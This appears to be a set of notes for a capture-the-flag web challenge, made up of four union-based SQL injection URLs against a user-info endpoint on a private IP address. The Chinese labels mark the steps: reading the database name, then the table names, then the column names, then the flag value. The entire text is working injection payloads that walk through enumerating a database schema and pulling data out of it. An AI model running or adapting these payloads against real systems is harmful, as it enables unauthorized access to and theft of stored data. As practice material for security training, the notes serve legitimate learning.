http://172.13.64.178:8080/user/userinfo?id=1 and 1=2 union select 1,2,(database())---库名
http://172.13.64.178:8080/user/userinfo?id=1 and 1=2 union select1,2,group_concat(table_name) from information_schema.tables where table_schema=database()---表名
http://172.13.64.178:8080/user/userinfo?id=1 and 1=2 union select 1,2,(group_concat(column_name)) from information_schema.columns where table_name="flag"---列名
http://172.13.64.178:8080/user/userinfo?id=1 and 1=2 union select 1,2,(select flag from flag)---值